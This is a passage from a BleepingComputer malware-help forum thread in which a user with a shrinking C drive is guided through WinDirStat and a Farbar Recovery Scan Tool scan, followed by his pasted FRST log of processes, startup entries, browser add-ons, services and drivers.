Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus Continuously Eating my C Drive


  • This topic is locked This topic is locked
18 replies to this topic

#1 Liljoethemaster

Liljoethemaster

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 04 January 2016 - 08:01 PM

Hello there, bleepingcomps. 

I was wondering if you could help me figure out on this malware or virus that is eating my C Drive that is continuously slowing down to zero. I'm at currently 833 (Decreasing atm) Gb to 907 Gb on my Windows 8.1 Hp Laptop C Drive. I done every method to use every anti-malware program including Malwarebytes, Superantispyware and every program to offer me to take out but the problem is still remaining and still decreasing but no luck to take it out including the disk cleanup is having trouble not being able to fully delete the junk stuff I have in the temp and everything I do. I don't know about the WinSxS folder if that is the problem or just the random virus and malware is eating my C Drive but i keep attempting and it is continuously keep on going. Please help a brother out, I did every measure and the booting but I don't know what I'm missing.



BC AdBot (Login to Remove)

 


#2 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 04 January 2016 - 08:36 PM

Welcome,

 

Please tell me if you have AVG Web TuneUp installed.

 

https://support.avg.com/answers?id=906b00000008svJAAQ

 

Please download, install and run WinDirStat and see where the files are distributed.

 

Regards,

thcbytes


Edited by thcbytes, 04 January 2016 - 09:14 PM.
Correction and clarification

Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#3 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 04 January 2016 - 09:38 PM

I installed AVG Secure Search and this is what I got in WinDirStat:



#4 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 04 January 2016 - 09:49 PM

Fx6awfm


Fx6awfm.png?2



#5 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 04 January 2016 - 09:53 PM

Hello again. 

I moved you to a section of the forum that I can obtain more detailed info.

Your hard drive does not look full at all. Its 92% free.
 
Did you just install AVG Secure Search now?  I just wanted to know if you happened to have already installed AVG Web TuneUp previously as it has been a source of trouble to others with regards to occupying hard drive space.
 
Please do this please.

Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your desktop ---> Important
  • If you are unsure if you have 32 bit or 64 bit simply download and try one. If that doesn't run properly the other one should
  • Double click the icon
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
Regards,
thcbytes
Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#6 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 04 January 2016 - 10:10 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
Ran by Joseph (administrator) on LILJOETHEMASTER (04-01-2016 20:56:41)
Running from C:\Users\Joseph\Downloads
Loaded Profiles: Joseph (Available Profiles: Joseph)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(mst software GmbH, Germany) C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\DfSdkS64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(%CFullName%) C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Ashampoo Development GmbH & Co. KG) C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner2.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\A2SERVICE.EXE.old
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\A2WIZARD.EXE.old
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\loggingserver.exe
() C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
(Seifert) C:\Program Files (x86)\WinDirStat\windirstat.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\ScriptHelperInstaller\19.1.0\ScriptHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Users\Joseph\AppData\Local\Temp\mpam-df95902f.exe
(Microsoft Corporation) C:\1d7cd1e922cb58a9eff044172c65\MPSigStub.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8781568 2015-11-27] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-11-27] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2015-02-26] (Synaptics Incorporated)
HKLM\...\Run: [Ashampoo WinOptimizer Live-Tuner2] => C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner2.exe [3516808 2014-04-14] (Ashampoo Development GmbH & Co. KG)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [896632 2015-07-22] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-06-16] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [286992 2015-11-29] (RealNetworks, Inc.)
HKLM-x32\...\Run: [RealDownloader] => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [719632 2015-11-04] ()
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [657424 2015-09-03] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-11-09] (Oracle Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe [5836888 2016-01-04] (Emsisoft Ltd)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [2573712 2016-01-04] ()
HKLM-x32\...\RunOnce: [GrpConv] => grpconv -o
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealTimes.lnk [2015-12-30]
ShortcutTarget: RealTimes.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpsystray.exe (RealNetworks, Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{61080605-F2B7-444D-81D5-8FBA64FDF543}: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
URLSearchHook: [S-1-5-21-1412126346-3748250155-1825200208-1002] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> {DDB578EF-F53A-4EF5-8899-5AF9388D9B0A} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1412126346-3748250155-1825200208-1002 -> {DDB578EF-F53A-4EF5-8899-5AF9388D9B0A} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2015-11-04] (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2015-11-04] (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-12-28] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-12-28] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\19.1.0\ViProtocol.dll [2016-01-04] (AVG Secure Search)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-09-22] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-09-22] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\19.1.0\\npsitesafety.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-12-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-12-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-05] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=18.1.2.175 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-11-29] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=18.1.2.175 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-11-29] (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: No Name - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2016-01-04] [not signed]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\4EE9D714CCDF205C798D6ABB8B1239644EE9 [2015-11-19] <==== ATTENTION
 
Chrome: 
=======
CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-04]
CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-04]
CHR Extension: (Google Search) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-04]
CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-04]
CHR Extension: (AVG Secure Search) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2016-01-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-04]
CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-04]
CHR HKLM-x32\...\Chrome\Extension: [fidikogfgleiaefnjbmnjaplmgknppkg] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [7084784 2016-01-04] (Emsisoft Ltd)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433784 2015-06-16] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413304 2015-06-16] (BlueStack Systems, Inc.)
R2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [831096 2015-07-21] (BlueStack Systems, Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 DfSdkS; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\DfsdkS64.exe [544768 2009-08-24] (mst software GmbH, Germany) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2015-09-03] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2015-02-26] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [124928 2015-07-02] (Softex Inc.) [File not signed]
R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [33088 2015-11-04] ()
R2 RealTimes Desktop Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1095976 2015-11-29] (RealNetworks, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [307456 2015-11-27] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2015-02-26] (Synaptics Incorporated)
R2 vToolbarUpdater19.1.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe [1864592 2016-01-04] (AVG Secure Search)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WO_LiveService2; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe [223624 2014-04-14] ()
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [145528 2015-06-16] (BlueStack Systems)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [100624 2015-06-08] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 ElgatoGC658Y; C:\Windows\System32\Drivers\ElgatoGC658.sys [52456 2014-11-13] (UB658)
R1 epp64; C:\Windows\System32\DRIVERS\epp64.sys [135800 2015-03-24] (Emsisoft GmbH)
R3 GPIO; C:\Windows\System32\drivers\iaiogpioe.sys [31232 2013-11-11] (Intel Corporation)
R3 int0800; C:\Windows\System32\drivers\flashud.sys [51712 2009-03-06] (Intel Corporation)
R2 LiveTuner2PM; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner64.sys [14320 2014-03-20] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-04] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-01-23] (Intel Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2432656 2014-08-12] (MediaTek Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2015-02-26] (Realtek Semiconductor Corp.)
R3 rtbth; C:\Windows\System32\drivers\rtbth.sys [1205872 2015-02-26] (Ralink Technology, Corp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [29936 2013-12-12] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [33960 2015-09-08] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.)
R3 XSplit_Dummy; C:\Windows\system32\drivers\xspltspk.sys [26200 2014-07-02] (SplitmediaLabs Limited)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-04 20:56 - 2016-01-04 20:59 - 00021951 _____ C:\Users\Joseph\Downloads\FRST.txt
2016-01-04 20:56 - 2016-01-04 20:56 - 00000000 ____D C:\FRST
2016-01-04 20:54 - 2016-01-04 20:55 - 02370560 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
2016-01-04 20:12 - 2016-01-04 20:12 - 00000000 ____D C:\1d7cd1e922cb58a9eff044172c65
2016-01-04 20:00 - 2016-01-04 20:00 - 00001014 _____ C:\Users\Joseph\Desktop\WinDirStat.lnk
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinDirStat
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\Local\AVG SafeGuard toolbar
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\AVG Secure Search
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Program Files (x86)\WinDirStat
2016-01-04 19:59 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\AVG SafeGuard toolbar
2016-01-04 19:59 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\AVG SafeGuard toolbar
2016-01-04 19:59 - 2016-01-04 19:59 - 00645729 _____ (WDS Team) C:\Users\Joseph\Downloads\windirstat1_1_2_setup.exe
2016-01-04 19:59 - 2016-01-04 19:59 - 00000000 ____D C:\Program Files (x86)\AVG SafeGuard toolbar
2016-01-04 19:56 - 2016-01-04 19:57 - 00207640 _____ C:\Users\Joseph\Downloads\AVG Secure Search.exe
2016-01-04 18:56 - 2016-01-04 18:56 - 00001074 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
